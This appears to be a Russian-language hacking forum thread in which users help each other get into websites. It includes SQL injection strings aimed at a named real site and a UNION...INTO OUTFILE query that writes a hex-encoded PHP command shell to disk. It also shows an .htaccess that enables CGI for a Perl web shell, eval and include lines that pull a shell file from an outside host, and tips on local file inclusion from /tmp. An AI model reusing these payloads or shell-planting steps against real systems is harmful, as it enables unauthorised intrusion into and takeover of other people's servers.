warlok посоветуй плиз какой конкретно, я пробовал c99madshell и wso2.4, другими не пользовался [добавлено] попробовал PPS 1.0 - Perl-cgi web shell by Pashkela, но отображается текстом. залил такой .htaccess Code: Options +ExecCGI AddHandler cgi-script cgi pl проблема решена но если кто ответит на мои вопросы то тоже будет очень клева
Не могу составить правильный запрос, наверно дико туплю http://www.macemates.net/news.asp?P=7+AND+1=2-- http://www.macemates.net/news.asp?P=7%27+AND+1=2-- http://www.macemates.net/news.asp?P=7%29+AND+1=2-- не прокатывают, как вы составляете правильное выражение ??? пожалуста пример если можно
Microsoft JET Database Engine error '80040e14' значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
здрасте Не Могу понять в чем проблема.. делаю такой запрос : 6+union+select+1+into+outfile+'1.php'+--+ на что получил ответ : display_db_query: SELECT content from page where id = -6 union select 1 into outfile '1.php' -- File '1.php' already exists ТОЕСТЬ я могу создавать файлы ? потом делаю что то такое: 6+union+select+load_file(0x3C3F706173737468727528245F4745545B27636D64275D293B3F3E)+into+outfile+'1.php'+--+ на что получил ответ : display_db_query: SELECT content from page where id = 6 union select load_file(0x3C3F706173737468727528245F4745545B27636D64275D293B3F3E) into outfile '1.php' -- File '1.php' already exists и как мне теперь проверить что у меня получилось ? где мне найти этот '1.php' если кому не лень можна и попадробней в PM спс за время.
в дефолтной папке mysql (уже не помню какая) уже есть файл 1.php. Зачем тебе его искать? Можно в /tmp создать PS в пм мне не надо писать, я не умею ломать сайты и никогда этим не занимался
да @@datadir прочитать этот файл через load_file P.S. Я на все твои вопросы ответил, ответь на 1 мой. Сколько нужно курить, чтобы составить этот запрос?
пробовал так cmd=eval(file_get_contents('http://site.ru/downloads/shell.txt')); и cmd=include($_GET['http://site.ru/downloads/shell.txt']); нефига не работают!!
Gorev Повтарюсь что eval и include неработают!! удалось только загрузить шел в папку тмп и сделать локальный инклуид cmd=include("/tmp/shell.php"); но и в этом случае такая же фигня получается...
GOGA075 в сообщении Gorev-a нет Eval или include тут функция system,будешь работать с командами системы